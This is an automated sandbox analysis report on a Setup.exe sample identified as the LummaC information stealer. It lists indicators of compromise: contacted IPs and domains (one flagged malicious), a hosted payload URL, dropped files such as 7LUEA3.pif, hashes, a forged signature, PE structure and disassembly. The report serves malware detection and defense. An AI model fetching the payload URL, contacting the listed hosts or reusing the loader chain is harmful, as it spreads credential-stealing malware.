                                                                                                                                                                              https://steamcommunity.com/profiles/76561198043764602/games/?tab=allInstallUtil.exe, 0000000F.00000002.2492246626.00000000018A4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.google.com/recaptcha/InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://checkout.steampowered.com/InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://www.info-zip.org/Setup.exe, 00000000.00000002.1211394304.000000000460E000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.000000000558F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://steamcommunity.com/profiles/76561198257089751InstallUtil.exe, 0000000F.00000002.2492246626.0000000001970000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.000000000190C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=g2Zx7e0yBV_M&amp;l=englishInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://store.steampowered.com/;InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://store.steampowered.com/about/InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://steamcommunity.com/my/wishlist/InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=qM6wpZLwO_gf&ampInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=oaWa21XUbd8h&l=InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://help.steampowered.com/en/InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
62.60.234.80 | unknown | Iran (ISLAMIC Republic Of) | 18013 | ASLINE-AS-APASLINELIMITEDHK | false
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
172.67.131.254 | sliperyedhby.icu | United States | 13335 | CLOUDFLARENETUS | true
172.67.185.54 | cdn1.pixel-story.shop | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557280
Start date and time: 2024-11-18 00:14:40 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Setup.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@14/8@3/4
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 70
• Number of non-executed functions: 188
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                          • Execution Graph export aborted for target InstallUtil.exe, PID 2852 because there are no executed function
                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                          • VT rate limit hit for: Setup.exe
Time | Type | Description
18:15:13 | API Interceptor | 1x Sleep call for process: Setup.exe modified
18:15:22 | API Interceptor | 14x Sleep call for process: msiexec.exe modified
                                                                                                                                                                                                          • 172.67.131.254
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 172.67.185.54
                                                                                                                                                                                                          • 172.67.131.254
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 172.67.185.54
                                                                                                                                                                                                          • 172.67.131.254
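Match: C:\Users\user\AppData\Roaming\7LUEA3.pif
• Associated Sample Name / URL: Setup.exe, Detection: malicious, Threat Name: LummaC
• Associated Sample Name / URL: Setup.exe, Detection: malicious, Threat Name: LummaC, Amadey, LummaC Stealer
• Associated Sample Name / URL: setup.exe, Detection: malicious, Threat Name: LummaC
• Associated Sample Name / URL: setup.exe, Detection: malicious, Threat Name: LummaC
• Associated Sample Name / URL: Setup.exe, Detection: malicious, Threat Name: LummaC, Amadey, LummaC Stealer
• Associated Sample Name / URL: drivers-v1.ps1, Detection: malicious, Threat Name: LummaC
• Associated Sample Name / URL: getsetup3rd.ps1, Detection: malicious, Threat Name: LummaC
• Associated Sample Name / URL: paracms.ps1, Detection: malicious, Threat Name: LummaC
• Associated Sample Name / URL: getup.ps1, Detection: malicious, Threat Name: LummaC
• Associated Sample Name / URL: https://zip-store.oss-ap-southeast-1.aliyuncs.com/updated%20file/paracms.txt, Detection: malicious, Threat Name: LummaC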

Process: C:\Windows\SysWOW64\choice.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 304640
Entropy (8bit): 6.821877812702892
Encrypted: false
SSDEEP: 6144:NLJBMdLZks8s4gOQv7G3q0ZuxPDJ4JJmfvvO:RJu1JRUq0ZQPDJ4JEO
MD5: 8A91B92911FDCC70DB54D1E42E44B43B
SHA1: 7C9EED64B5DE5DA453B09BE921115E45302385EA
SHA-256: 13101E6D0314D350C9905AA4FB06C86BD57317E6D9C87A5A9913D4A56565B442
SHA-512: 3D432A1A23B09B8CE067215C150AE6592E7D5D736D17C890F3ED8FAD1E93FB4F3F023A4BCD637C81A60D8499E493DA958A46683B15DE09E0BCEB610D3F579141
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 66%
Reputation: low

Process: C:\Users\user\Desktop\Setup.exe
File Type: PNG image data, 2256 x 1266, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 1222022
Entropy (8bit): 7.990154874748457
Encrypted: true
SSDEEP: 24576:HzpXZUiYREqgUUSj1hEImaTBfu6LzuR4N0pzKwfe9Lf:ThinEJSj1hbVN5L7Nuaf
MD5: 4615267061BD631365026A16EE70CCA1
SHA1: BB27190771097C240D846BB2666B366F3C6016AD
SHA-256: 95E75DD101A71FE9F06C6D3104532907728812A0F9F7C5349CD9FDA0C148FB9E
SHA-512: 4D13ED3F0D03B5E3E54A5B8669EE78BF8F8A086AF25F4B91A449DE566455104BE8DE5FBD7C1C14F7085C932872F47615C146C7B9E4C2BB0F4042962B2228B51A
Malicious: false
Reputation: low

Process: C:\Users\user\Desktop\Setup.exe
File Type: data
Category: dropped
Size (bytes): 1036400
Entropy (8bit): 7.567344532631297
Encrypted: false
SSDEEP: 24576:y2k1aYDUJv0cn3fP9hm6UhoBWMgF/E9/S:yD1zoJBPu4WAa
MD5: E66E8E04B5E3415EB373DC6F63A6D3BF
SHA1: E11DD950F02ED16D6C7176A088E2D528927674E7
SHA-256: 777963DBE94E1A22EC9A1C6CD262E700E69F2E1045831B8E738A2305792694B4
SHA-512: 5208946E36DCA6E8FE7BFAE577C26F5A861D96B612F36C6F90316F5690F5703359D528AF568C8062759EF32AE5B558C73F8917208D8F98CF064E7B7B39E09098
Malicious: false
Reputation: low

Process: C:\Windows\SysWOW64\msiexec.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 943784
Entropy (8bit): 6.621472142472864
Encrypted: false
SSDEEP: 24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
MD5: 3F58A517F1F4796225137E7659AD2ADB
SHA1: E264BA0E9987B0AD0812E5DD4DD3075531CFE269
SHA-256: 1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
SHA-512: ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: setup.exe, Detection: malicious
• Filename: setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: drivers-v1.ps1, Detection: malicious
• Filename: getsetup3rd.ps1, Detection: malicious
• Filename: paracms.ps1, Detection: malicious
• Filename: getup.ps1, Detection: malicious
• Filename: , Detection: malicious

Process: C:\Windows\SysWOW64\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 5998227
Entropy (8bit): 6.2868125845422
Encrypted: false
SSDEEP: 98304:j22WJaM4PM5XZ/n0r4OGBE2ZfhEMHv6/8nkELfb5CWG1x6Oxz:j2zZ5XZHq2fiMPnkqCWG1x6m
MD5: 7E51997869F0AFFE433246A2E5E05677
SHA1: 33B64808A4ECF3CFB7249FAB50DD53A54E4B523B
SHA-256: 52BAB3A2E53F7CEF4D612EE22D0CFC25E3684EE280F480B9AE987E360AA78F84
SHA-512: EA65EA9E673105B4964CBB01ADE50CC1F1819974720C4A1F99233F937B5B022D9BE37C25B7DA39B1B9D64026A94171C1B08B2686B5DC5A4BF2912627312D183C
Malicious: false
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):232
                                                                                                                                                                                                                              Entropy (8bit):3.437954495767831
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:nYJgJ8fHlNQNAWFQtiEZGbky0lB3PlAnlP1:6gJmHYNAkQGbkVB3s3
                                                                                                                                                                                                                              MD5:8F4DF4C2CE5BAD29313CA9FFBAAF221F
                                                                                                                                                                                                                              SHA1:A457C6AE0FA8F630A4FE0166BB5CE393874EA0FC
                                                                                                                                                                                                                              SHA-256:ED2DED7A551CBB4191AC6378CBD617D222BFE2BFD8B41BB75B8BBA3CAC80A0B7
                                                                                                                                                                                                                              SHA-512:44C9228C06E7CC985EB287CAD93D3A223903FA1F4936885E179740B0476AB9CCE557DADDAE6F5A75586208AEA9CA73B02E0574CD5543C221AFEDF6F620F30494
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.....=.b{z.A...O..._F.......<... ................ .................... .C.:.\.U.s.e.r.s.\.c.a.l.i.\.D.e.s.k.t.o.p.\.S.e.t.u.p...e.x.e.........C.A.L.I.-.P.C.\.c.a.l.i...................0.........1.....................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\7LUEA3.pif
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):943784
                                                                                                                                                                                                                              Entropy (8bit):6.621472142472864
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
                                                                                                                                                                                                                              MD5:3F58A517F1F4796225137E7659AD2ADB
                                                                                                                                                                                                                              SHA1:E264BA0E9987B0AD0812E5DD4DD3075531CFE269
                                                                                                                                                                                                                              SHA-256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
                                                                                                                                                                                                                              SHA-512:ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\7LUEA3.pif
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5998227
                                                                                                                                                                                                                              Entropy (8bit):6.2868125845422
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:98304:j22WJaM4PM5XZ/n0r4OGBE2ZfhEMHv6/8nkELfb5CWG1x6Oxz:j2zZ5XZHq2fiMPnkqCWG1x6m
                                                                                                                                                                                                                              MD5:7E51997869F0AFFE433246A2E5E05677
                                                                                                                                                                                                                              SHA1:33B64808A4ECF3CFB7249FAB50DD53A54E4B523B
                                                                                                                                                                                                                              SHA-256:52BAB3A2E53F7CEF4D612EE22D0CFC25E3684EE280F480B9AE987E360AA78F84
                                                                                                                                                                                                                              SHA-512:EA65EA9E673105B4964CBB01ADE50CC1F1819974720C4A1F99233F937B5B022D9BE37C25B7DA39B1B9D64026A94171C1B08B2686B5DC5A4BF2912627312D183C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Entropy (8bit):7.094768425761549
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 98.04%
                                                                                                                                                                                                                              • Inno Setup installer (109748/4) 1.08%
                                                                                                                                                                                                                              • InstallShield setup (43055/19) 0.42%
                                                                                                                                                                                                                              • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                                              File name:Setup.exe
                                                                                                                                                                                                                              File size:8'060'800 bytes
                                                                                                                                                                                                                              MD5:0bf89e05c575d4bcdcdadb17c7517c29
                                                                                                                                                                                                                              SHA1:1040de2dca7b63045e6f201b62ff782154e2693c
                                                                                                                                                                                                                              SHA256:8ce1cde3bd1fa2945af8e03459775a87dba7275c17401ab19e525b3238609f6b
                                                                                                                                                                                                                              SHA512:b096dde0fd1f39edaf9ee9cde8a279bd6e737e30afc763319a031f6704fa68dd384966e07ea01646fde3fd38f6f428a044f7e7efdf0fae0cce1e6c5503518a87
                                                                                                                                                                                                                              SSDEEP:98304:X1UEEIu0hvmDN++ePpfyKrX70nMNjbtNET4A04Am:FURIXBp8KrX70MNHLETB0Bm
                                                                                                                                                                                                                              TLSH:83869E17B2C8743DD06E0A3A983B675C993FB665262B8C475BF8484C4F366807D3EA47
                                                                                                                                                                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                                                                              Icon Hash:74509878e0f8b0f0
                                                                                                                                                                                                                              Entrypoint:0x93215c
                                                                                                                                                                                                                              Entrypoint Section:.itext
                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                              Time Stamp:0x670FCC7E [Wed Oct 16 14:23:58 2024 UTC]
                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                                              OS Version Minor:1
                                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                                              File Version Minor:1
                                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                                              Subsystem Version Minor:1
                                                                                                                                                                                                                              Import Hash:c51c565da9ce8624cd9a5b20fe63461d
                                                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                              Error Number:-2146869232
                                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                                              • 21/09/2023 02:00:00 16/09/2026 01:59:59
                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                              • CN=Winsider Seminars & Solutions Inc., O=Winsider Seminars & Solutions Inc., L=Montr\xe9al, S=Quebec, C=CA
                                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                                              Thumbprint MD5:4CABCE3C1DBD4222FC4EE4272F7C367D
                                                                                                                                                                                                                              Thumbprint SHA-1:DABC572F9027D96E86B95852B2FD871CABC52300
                                                                                                                                                                                                                              Thumbprint SHA-256:85B8CB1D1FBF6BF39E47EAFE64D366F1ACDDA6766949F83E67BF6C72EC9BF29A
                                                                                                                                                                                                                              Serial:050A5A396D03EA60CD5368B3D7BAF7A6
                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                              add esp, FFFFFFF0h
                                                                                                                                                                                                                              mov eax, 0091EAECh
                                                                                                                                                                                                                              call 00007FC0802D3589h
                                                                                                                                                                                                                              call 00007FC0807DF78Ch
                                                                                                                                                                                                                              call 00007FC0802CB963h
                                                                                                                                                                                                                              mov eax, eax
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x5fa000 | 0x75 | .edata |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5ef000 | 0x3ac6 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x670000 | 0x191cb6 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x780bc0 | 0x2f3c0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5fd000 | 0x72c3a | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x5fc000 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x5efa20 | 0x8f4 | .idata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x5f3000 | 0x6aa4 | .didata |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x52c240 | 0x52c400 | 8bac1e473b28b42354f0b64d481e58c4 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .itext | 0x52e000 | 0x4178 | 0x4200 | 3ff3ba7d0bfc856a8d8980b53e0ffdf9 | False | 0.4564393939393939 | data | 6.111533303271676 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .data | 0x533000 | 0x11534 | 0x11600 | e817cd13e86ce42480605ca1c7aeb338 | False | 0.5090771133093526 | data | 5.829006891865401 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .bss | 0x545000 | 0xa9e1c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x5ef000 | 0x3ac6 | 0x3c00 | 51b014339cd48e61d335055d992fa10e | False | 0.319921875 | data | 5.222162309823883 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .didata | 0x5f3000 | 0x6aa4 | 0x6c00 | 4d9726c0fb961f4b11a687b531274673 | False | 0.2312282986111111 | data | 5.041727112613991 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .edata | 0x5fa000 | 0x75 | 0x200 | 4e255e95cda5e3eb09a9074ca1a39c0f | False | 0.1875 | data | 1.3774752808317143 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .tls | 0x5fb000 | 0x58 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rdata | 0x5fc000 | 0x5d | 0x200 | 70fc3c2f84bd2a34898b92ec5dfcc4c2 | False | 0.189453125 | data | 1.394850704273433 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x5fd000 | 0x72c24 | 0x72e00 | d79a287977bebc66c908700a6a0ade27 | False | 0.557065679406964 | data | 6.714014557917903 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x670000 | 0x191cb6 | 0x191e00 | d03229118faa5add68e62cc6dd49cf6e | False | 0.8988396675738725 | data | 7.793387895284203 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| GO | 0x670fd0 | 0x12a586 | PNG image data, 2256 x 1266, 8-bit/color RGB, non-interlaced | English | United States | 0.9967441558837891 |
| UNICODEDATA | 0x79b558 | 0x968f | data | | | 0.3783566406351348 |
| UNICODEDATA | 0x7a4be8 | 0x9ebb | data | | | 0.4321889996308601 |
| UNICODEDATA | 0x7aeaa4 | 0x8d6 | data | | | 0.5919540229885057 |
| UNICODEDATA | 0x7af37c | 0xb4bc | data | | | 0.41804270770294805 |
| UNICODEDATA | 0x7ba838 | 0xd91e | data | | | 0.44955201324169697 |
| UNICODEDATA | 0x7c8158 | 0x2035 | OpenPGP Secret Key | | | 0.6761673741661614 |
| RT_CURSOR | 0x7ca190 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635 |
| RT_CURSOR | 0x7ca2c4 | 0x134 | data | English | United States | 0.4642857142857143 |
| RT_CURSOR | 0x7ca3f8 | 0x134 | data | English | United States | 0.4805194805194805 |
| RT_CURSOR | 0x7ca52c | 0x134 | data | English | United States | 0.38311688311688313 |
| RT_CURSOR | 0x7ca660 | 0x134 | data | English | United States | 0.36038961038961037 |
| RT_CURSOR | 0x7ca794 | 0x134 | data | English | United States | 0.4090909090909091 |
| RT_CURSOR | 0x7ca8c8 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468 |
| RT_ICON | 0x7ca9fc | 0x26126 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9963255569378359 |
| RT_STRING | 0x7f0b24 | 0x2f4 | data | | | 0.44047619047619047 |
| RT_STRING | 0x7f0e18 | 0x448 | data | | | 0.3759124087591241 |
